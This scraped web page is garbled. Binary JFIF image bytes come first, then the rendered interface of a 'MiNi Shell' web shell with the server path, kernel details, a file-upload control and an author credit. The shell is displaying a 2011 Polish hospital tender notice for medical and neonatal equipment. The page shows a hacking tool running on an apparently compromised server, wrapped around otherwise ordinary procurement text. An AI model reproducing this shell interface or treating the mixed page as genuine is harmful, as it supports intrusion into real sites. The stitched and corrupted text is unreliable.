JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111215/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111215/427560-N-2011.html

<p class="kh_header"><b>Radom: Zakup  i dostawa  sprzętu jednorazowego i wielokrotnego użytku dla potrzeb Placówek Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 427560 - 2011; data zamieszczenia: 15.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup  i dostawa  sprzętu jednorazowego i wielokrotnego użytku dla potrzeb Placówek Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa sprzętu jednorazowego i wielokrotnego użytku dla potrzeb Palcówek Radomskiego Szpitala Specjalistycznego orientacyjne zapotrzebowanie na okres 2 lat):
Część nr 1 - Sprzęt jednorazowego i wielorazowego użytku
L.p	Nazwa asortymentu	Ilość szt.

1.	Rurki intubacyjne zbrojone ustno-nosowe z mankietem uszczelniającym:
-  rurka ustno-nosowa
-  z otworem Marphyego
 -  wykonana z przeźroczystego, miękkiego, elastycznego materiału, 
Automatyczna końcówka rurki
 - ścianki rurki wzmocnione drutem kwasoodpornym na całej długości rurki, odporna na zginanie
 - łącznik 15 mm
- oznaczenie rozmiaru na korpusie rurki i balonie
- 2 znaczniki głębokości
-  jałowa, jednorazowego użytku, pakowane pojedynczo
 - dostępne rozmiary w zakresie od 5,0 do 10,0 mm	
200
2.	Prowadnica do rurek intubacyjnych:
- jednorazowego użytku, 
- pakowana sterylnie
 -wykonana z miękkiego metalu umożliwiającego kształtowanie, pokrytego 
tworzywem PCV z  miękkim końcem,
-  rozmiar dla rurek intubacyjnych-:
 2,5 - 3,5 	100
	4,0 - 6,0 	100
	6,5 - 11,0 	200
3.	Prowadnica do trudnych intubacji typu BOUGIE:
- wielorazowego użytku,
- elastyczna z wygiętym końcem,
- rozmiar 15 Ch / 60 cm, w sztywnym futerale ochronnym	
20

Część nr 2 - Zestaw do drenażu wewnętrznego dróg moczowych
L.p	Nazwa asortymentu	Ilość zestawów

1.	Zestaw sterylny, nietoksyczny powinien zawierać:
a)	Kateter Pigtail podwójnie wygięty, średnica pętli pęcherzowej 2 cm, odstęp między pętlami 24-26cm.
b)	Prowadnik 110 cm.
c)	Popychacz
d)	Zacisk
Rozmiary 3F;4F;5F;6F	
1.020
Część nr 3 - Sprzęt oraz akcesoria do hemofiltracji
L.p	Nazwa asortymentu	Ilość szt.

1.	Dren do podgrzewacza 
- połączenie drenu poprzez złącza kompatybilne z zestawem do CRRT typu ST/TPE/OXIRIS/SEPTEX do aparatu Prismaflex	100

2.	Worek 9 litrowy na ultra filtrat
- kompatybilny z zestawem do zabiegów CRRT do aparatu Prismaflex	100

Część nr 4 - Różne akcesoria medyczne
L.p	Nazwa asortymentu	Ilość szt.

1.	Linia próbkująca do monitorowania gazów anestezjologicznych
- długość 2 metry
- obustronnie zakończoną końcówką luer męską z gwintem
- pakowane sterylnie
- kompatybilna z monitorem GE Datek - Ohmeda S/5 CAM i S/5 FM	2000

2.	Czujnik tlenu do aparatu do znieczulenia
- kompatybilny z aparatem GE Datek - Ohmeda S/5 Aespire 7900
- czujnik musi posiadać datę ważności nie krótszą niż 1 rok od chwili zakupu	24

Część nr 5 - Układ oddechowy z podgrzewanym ramieniem wdechowym
L.p	Nazwa asortymentu	Ilość zestawów

1.	Układ oddechowy z podgrzewanym ramieniem wdechowym (jednorazowy) do aparatu Infant Flow SiPAP prod.VIASYS Respiratory Care inc . 	
90

Część nr 6 - Zestaw jednorazowych rur do respiratora dla noworodków
L.p	Nazwa asortymentu	Ilość zestawów

1.	Zestaw jednorazowych rur do respiratora - dla noworodków  (system RT 125 Fisher&Paykel)	
70

Część nr 7 - Zestaw do transfuzji wymiennej dla noworodków
L.p	Nazwa asortymentu	Ilość zestawów

1.	Zestaw do transfuzji wymiennej dla noworodków, w składzie :
 - catheter PCV FG.05 - 1 szt.
 - catheter PCV FG.07 - 1 szt. 
 - strzykawka Luer 20 cm - 2 szt.
 - strzykawka Luer 10 cm - 1 szt.
 - aparat toczący krew z kranikiem
 - worek odpływowy do krwi
 - zestaw gazików jałowych do opatrunku
 - tabela wymiany krwi (pobierania i podawania)
 - igła 5/10 G 25 - 1 szt.
 - rękawiczki lateksowe - 1 para	
10

Część nr 8 - Zestaw wielokomorowy do drenażu klatki piersiowej dla noworodka
L.p	Nazwa asortymentu	Ilość zestawów

1.	Zestaw wielokomorowy do drenażu klatki piersiowej dla noworodka :
 - komora kolekcyjna o poj.150ml
 - mechaniczna komora regulacji podciśninienia umożliwiająca bardzo precyzyjne ustawienie siły ssania za pomocą mechanicznego pokrętła działającego skokowo zakresie 10cm-30cmH2O
 - komory zawierające barwnik
 - optyczny wskaźnik poprawnego działania źródła światła
 - miernik przecieku doopłucnego
 - komplet drenów
 - wyposażony w uchwyt do noszenia w ręku i wieszaki do zawieszania na łóżku oraz szeroką plastikową podstawę do postawienia na podłodze - pakowany sterylnie	
10.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2, 33.14.16.40-8, 33.17.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ,że Wykonawca posiada wiedzę i doświadczenie, jeżeli wykaże, że w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał dostawy oferowanego towaru na kwotę :
Dla części nr 1 - min.  14.000,00 PLN,
Dla części nr 2 -  min. 58.000,00 PLN
Dla części nr 3 - min.   3.600,00 PLN
Dla części nr 4 - min. 26.000,00 PLN
Dla części nr 5 - min. 18.000,00 PLN
Dla części nr 6 - min.   5.000,00 PLN
Dla części nr 7 - min.      970,00 PLN
Dla części nr 8- min.     1.500,00 PLN
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Pełnomocnictwo do reprezentowania jeżeli ofertę składa pełnomocnik.
2.	Wypełniony formularz oferty.
3.	Wypełniony formularz cenowy/specyfikacja techniczna</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje  następujące zmiany w umowie:
a)ceny jednostkowe brutto mogą ulec zmianie w przypadku zmiany stawki podatku VAT wprowadzonej przepisami prawa- mogą się zmienić od dnia wejścia w życie danego aktu prawnego, przy czym zmianie ulegnie wyłącznie cena brutto.
b) Ceny jednostkowe brutto mogą ulec zmianie ( na wniosek Dostawcy) po upływie roku obowiązywania umowy o wskaźnik inflacji ogłoszony przez GUS za ostatni kwartał przed upływem roku obowiązywania umowy.
c)Przedmiotem zmian treści umowy mogą być również zmiany adresowe  lub rejestrowe stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych Funduszy Strukturlanych i Zaopatrzenia
ul. Lekarska 4 26-610 Radom
piętro III pokój nr 308 lub 313.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 13:00, miejsce: Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych Funduszy Strukturlanych i Zaopatrzenia
ul. Lekarska 4 26-610 Radom
piętro III pokój nr 308 lub 313.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzęt jednorazowego i wielorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa asortymentu	Ilość szt.
1.	Rurki intubacyjne zbrojone ustno-nosowe z mankietem uszczelniającym:
-  rurka ustno-nosowa
-  z otworem Marphyego
 -  wykonana z przeźroczystego, miękkiego, elastycznego materiału, 
Automatyczna końcówka rurki
 - ścianki rurki wzmocnione drutem kwasoodpornym na całej długości rurki, odporna na zginanie
 - łącznik 15 mm
- oznaczenie rozmiaru na korpusie rurki i balonie
- 2 znaczniki głębokości
-  jałowa, jednorazowego użytku, pakowane pojedynczo
 - dostępne rozmiary w zakresie od 5,0 do 10,0 mm	
200
2.	Prowadnica do rurek intubacyjnych:
- jednorazowego użytku, 
- pakowana sterylnie
 -wykonana z miękkiego metalu umożliwiającego kształtowanie, pokrytego 
tworzywem PCV z  miękkim końcem,
-  rozmiar dla rurek intubacyjnych-:
 2,5 - 3,5 	100
	4,0 - 6,0 	100
	6,5 - 11,0 	200
3.	Prowadnica do trudnych intubacji typu BOUGIE:
- wielorazowego użytku,
- elastyczna z wygiętym końcem,
- rozmiar 15 Ch / 60 cm, w sztywnym futerale ochronnym	
20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zestaw do drenażu wewnętrznego dróg moczowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa asortymentu	Ilość zestawów
1.	Zestaw sterylny, nietoksyczny powinien zawierać:
a)	Kateter Pigtail podwójnie wygięty, średnica pętli pęcherzowej 2 cm, odstęp między pętlami 24-26cm.
b)	Prowadnik 110 cm.
c)	Popychacz
d)	Zacisk
Rozmiary 3F;4F;5F;6F	
1.020.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sprzęt oraz akcesoria do hemofiltracji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa asortymentu	Ilość szt.
1.	Dren do podgrzewacza 
- połączenie drenu poprzez złącza kompatybilne z zestawem do CRRT typu ST/TPE/OXIRIS/SEPTEX do aparatu Prismaflex	100
2.	Worek 9 litrowy na ultra filtrat
- kompatybilny z zestawem do zabiegów CRRT do aparatu Prismaflex	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Różne akcesoria medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa asortymentu	Ilość szt.
1.	Linia próbkująca do monitorowania gazów anestezjologicznych
- długość 2 metry
- obustronnie zakończoną końcówką luer męską z gwintem
- pakowane sterylnie
- kompatybilna z monitorem GE Datek - Ohmeda S/5 CAM i S/5 FM	2000

2.	Czujnik tlenu do aparatu do znieczulenia
- kompatybilny z aparatem GE Datek - Ohmeda S/5 Aespire 7900
- czujnik musi posiadać datę ważności nie krótszą niż 1 rok od chwili zakupu	24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Układ oddechowy z podgrzewanym ramieniem wdechowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa asortymentu	Ilość zestawów
1.	Układ oddechowy z podgrzewanym ramieniem wdechowym (jednorazowy) do aparatu Infant Flow SiPAP prod.VIASYS Respiratory Care inc . 	
90.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zestaw jednorazowych rur do respiratora dla noworodków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa asortymentu	Ilość zestawów
1.	Zestaw jednorazowych rur do respiratora - dla noworodków  (system RT 125 Fisher&Paykel)	
70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zestaw do transfuzji wymiennej dla noworodków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa asortymentu	Ilość zestawów
1.	Zestaw do transfuzji wymiennej dla noworodków, w składzie :
 - catheter PCV FG.05 - 1 szt.
 - catheter PCV FG.07 - 1 szt. 
 - strzykawka Luer 20 cm - 2 szt.
 - strzykawka Luer 10 cm - 1 szt.
 - aparat toczący krew z kranikiem
 - worek odpływowy do krwi
 - zestaw gazików jałowych do opatrunku
 - tabela wymiany krwi (pobierania i podawania)
 - igła 5/10 G 25 - 1 szt.
 - rękawiczki lateksowe - 1 para	
10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zestaw wielokomorowy do drenażu klatki piersiowej dla noworodka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa asortymentu	Ilość zestawów
1.	Zestaw wielokomorowy do drenażu klatki piersiowej dla noworodka :
 - komora kolekcyjna o poj.150ml
 - mechaniczna komora regulacji podciśninienia umożliwiająca bardzo precyzyjne ustawienie siły ssania za pomocą mechanicznego pokrętła działającego skokowo zakresie 10cm-30cmH2O
 - komory zawierające barwnik
 - optyczny wskaźnik poprawnego działania źródła światła
 - miernik przecieku doopłucnego
 - komplet drenów
 - wyposażony w uchwyt do noszenia w ręku i wieszaki do zawieszania na łóżku oraz szeroką plastikową podstawę do postawienia na podłodze - pakowany sterylnie	
10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com